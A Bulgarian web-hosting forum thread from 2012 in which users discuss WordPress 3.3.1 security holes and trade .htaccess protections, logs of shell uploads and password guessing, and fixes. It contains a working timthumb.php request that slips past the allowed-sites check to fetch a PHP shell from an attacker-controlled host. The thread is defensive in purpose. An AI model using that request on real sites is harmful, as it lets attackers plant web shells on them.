Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

pepi7543 · 26 Януари 2012

Ако имате WordPress 3.3.1 и по-ниска версия и се чудите как са ви хакнали: WordPress <= 3.3.1 Multiple Vulnerabilities
Дереджето е такова че не знаеш дали да ъпдейтнеш или не :scared:

scoobydoo · 26 Януари 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Като гледам повечето са през wp-admin така че htaccess парола там ще помогне

.

pepi7543 · 27 Януари 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Добре си се сетил. Въпроса е ако имаш 50-на и повече блога колко време ще ти отнеме защитаването с пароли? Май ще е по-добре да си направим един htaccess с достъп по айпи адрес и да го качим по блоговете докато не го фикснат, за много блогове ще стане доста по-бързо.

Alexius · 27 Януари 2012

Re: За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Re: За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

scoobydoo каза:
Като гледам повечето са през wp-admin така че htaccess парола там ще помогне .

Може ли да обясниш по-подробно как става, благодаря предварително

scoobydoo · 27 Януари 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Може през Cpanel -> търсиш в Google -> password protect folder cpanel

TheCrazyBastard · 28 Януари 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Правите един празен документ с notepad, в който поставяте следното:
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Example Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
allow from 127.0.0.1
allow from 127.0.0.1
</LIMIT>
Където даденото IP заменяте с ваше или няколко ги изреждате на нов ред. Запаметявате файла без име и променяте околончанието му от .txt на .htaccess . Поставяте това файлче в папката "wp-admin". Т.е. дори някой да успее да се логне с правилната ви парола от wp-login.php, като е с друг компютър ще му зарежда само бяла страница за администраторското меню. Но щом я знае.. сигурно знае и други неща.. и как да ви боли глава така или иначе..

bulram · 28 Януари 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Има още неща които могат да се сложат в това "файлче" или пък подобни "файлчета" да се сложат и в други папки?

<limit GET POST PUT>
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
Allow from 127.0.0.2
Allow from 127.0.0.3
</limit>

# protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>

# protect wpconfig.php
<files wp-config.php>
order allow,deny
deny from all
</files>

#Disable Directory Browsing
Options All -Indexes

scoobydoo · 28 Януари 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Между другото ако потърсите в гугле за нещо подобно на wordpress security tips ще излязат статии с още десетки съвети за подобряване на сигурността. Който иска може и тях да приложи или да си избере които иска.

katsarov · 29 Януари 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За сигурност не говорете, ако искат ще я хакнат, ако не искат няма. Винаги има начини. Но досега най-добрата защита която съм виждал за wordpress е като се качва файл, да иска парола и то само от едно IP. Отиде ли Wordpress, отива и целия хостинг.

s1yf0x · 1 Март 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Адин от основните начини за качване на php shell-ове е през wp-admin:

Код:

193.111.9.98 - - [01/Mar/2012:06:32:45 +0200] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5434 "http://yoursite.com/wp-admin/plugin-install.php?tab=upload" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
193.111.9.98 - - [01/Mar/2012:06:33:09 +0200] "POST /wp-content/plugins/zbifxoeeeyf/gsm.php? HTTP/1.1" 404 - "http://yoursite.com/wp-content/plugins/zbifxoeeeyf/gsm.php?act=eval" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"

В случая се използва update.php за да се качи нов плъгин. При втората заявка сървъра е върнал грешка 404 въпреки, че шела е качен, защото не му дава възможност да се изпълни (забранява го). Вероятна причина за пробивите е компрометирана парола, с изброяване или директно открадната от компютъра на поддържащия WP-то. Stealer-и и keylogger-и има достатъчно в нета. Една добра програма за windows за засичане на подобни гниди е Hijack Hunter: Hijack Hunter Другото, което е задължително да се направи е да се защити wp-admin директорията с ограничаване на POST заявките само от определени IP адреси и допълнителна парола, което вече е разисквано в много теми, вкл. и тази.

Общо взето, ако тази глупост "php?act=eval" се появи някъде из лговете ви за деня, значи някой определено се е опитал да зарази WP инсталацията ви.

docenta · 16 Март 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Защитата на админа с htpasswd си е направо задължителна.

s1yf0x · 18 Март 2012

За: Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

docenta каза:
Защитата на админа с htpasswd си е направо задължителна.

Но не е достатъчна. Напоследък се забелязва и един скрипт, който изброява пароли, вроятно е perl. Заявките са директно към wp-login.php, а не към /wp-admin. Ето как изглеждат:

Код:

216.226.157.129 - - [05/Feb/2012:13:53:32 +0200] "POST /wp-login.php 
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"
216.226.157.129 - - [05/Feb/2012:13:53:46 +0200] "POST /wp-login.php
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"
216.226.157.129 - - [05/Feb/2012:13:53:55 +0200] "POST /wp-login.php
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"
216.226.157.129 - - [05/Feb/2012:13:54:06 +0200] "POST /wp-login.php
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"
216.226.157.129 - - [05/Feb/2012:13:53:43 +0200] "POST /wp-login.php
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"
216.226.157.129 - - [05/Feb/2012:13:53:58 +0200] "POST /wp-login.php
HTTP/1.1" 200 4376 "-" "Mozilla/5.0 (compatible; bingbot/2.0;+http://www.bing.com/bingbot.htm)"

Решението е защита с .htpasswd само на файла wp-login.php. Ето тук съм описал как: Защита на файла, за достъп до администрация на WordPress сайт | Какво е хостинг и домейн, създаване на уеб сайт

scoobydoo · 19 Март 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

@s1yf0x
Бота се опитва да налучка паролата ли? И също да попитам, това ако го блокираме ще попречи на потребителите на сайта (ако имаме такива) да се логват нали?

Ma57eR · 19 Март 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Мернах тия дни някакъв плъгин "Login Lock" или нещо от тоя сорт, който след определен брой грешни опити блокира IP-то за определен период от време. Това също според мен би било от полза за ползвателите, от гледна точка защита.

s1yf0x · 19 Март 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

scoobydoo каза:
@s1yf0x
Бота се опитва да налучка паролата ли? И също да попитам, това ако го блокираме ще попречи на потребителите на сайта (ако имаме такива) да се логват нали?

Това не е Bing бот, а "претендира" за такъв, за да не буди явно подозрение при бегъл поглед. Всеки който е ползвал perl или curl знае, че User-Agnet-а лесно се сменя. Да, потребителите ще трябва да въвеждат и втора парола.

Ma57eR каза:
Мернах тия дни някакъв плъгин "Login Lock" или нещо от тоя сорт, който след определен брой грешни опити блокира IP-то за определен период от време. Това също според мен би било от полза за ползвателите, от гледна точка защита.

Не мисля, че инсталацията на допълнителен плъгин, който да утежни работата на сайта е правилно решение.

s1yf0x · 11 Април 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Ето и малко нови подорбности около сагата timthumb.php - засягат дори новата версия, която уж запушваше дупката. Днес имаше опит за пробив на сайт по този начин и благодарение на колегата от hostbulgaria.com го споделям и тук. В новата версия на thimthumb намираща се на адрес: http://timthumb.googlecode.com/svn/trunk/timthumb.php можете да забележете един масив:

Код:

$ALLOWED_SITES = array (
		'flickr.com',
		'staticflickr.com',
		'picasa.com',
		'img.youtube.com',
		'upload.wikimedia.org',
		'photobucket.com',
		'imgur.com',
		'imageshack.us',
		'tinypic.com',
	);

Ето и заявката, която заобикаля тази проверка за "разрешени сайтове"

Код:

 http://vashiat-nadupchen-wp-site.com/wp-content/themes/Ime na tema/timthumb.php?src=http://img.youtube.com.gnusenhaker.com/shit.php

забележете каква е стойността на параметъра src.... оставям го без коментар. Качва се шел на 100% без проблем.
Как да се препазим - в същия файл timthumb.php има и една конфигурационна опция defined('ALLOW_EXTERNAL'), която обикновено е TRUE - близко е до акъла, че трябва да стане FALSE

Код:

define ('ALLOW_EXTERNAL', TRUE);

т/ва да стане

define ('ALLOW_EXTERNAL', FALSE);

Ако все пак трябва да зареждате снимки от външен източник, трябва да редактирате още няколко неща по timthumb.php , но това оставям на програмистите. В крайна сметка се оказа, че експлойта за timthumb.php все още е актуален и не е напълно пачнат.

ktomov · 11 Април 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Другия вариант е да се промени арей стойността на $ALLOWED_SITES и да присъства само сайта от който искате да качвате външни снимки

Ma57eR · 11 Април 2012

Re: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Някой може ли да ми даде читав .htaccess със защитки, че изпитвам скапани проблеми с подкарването по нормалния начин?
(Надявам се никога повече да не ми се налага да ползвам Wordpress)

s1yf0x · 11 Април 2012

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Cloxy, не се смей ами дай акъл как да се добави проверка, която да не гърми на субдомейн.... нали си програмист

cloxy · 11 Април 2012

Re: За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

Re: За: Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

s1yf0x каза:
Cloxy, не се смей ами дай акъл как да се добави проверка, която да не гърми на субдомейн.... нали си програмист

Просто като се добавят в масива да са с по една наклонена черта накрая

Код:

$ALLOWED_SITES = array (
		'flickr.com/',
		'staticflickr.com/',
		'picasa.com/',
		'img.youtube.com/',
		'upload.wikimedia.org/',
		'photobucket.com/',
		'imgur.com/',
		'imageshack.us/',
		'tinypic.com/',
	);

Дупки в сигурността н WordPress 3.3.1 и по-ниски версии

New member

Know you can!

New member

New member

Know you can!

Member

Senior Member

Know you can!

New member

banned

New member

banned

Know you can!

New member

banned

banned

New member

New member

banned

Super Moderator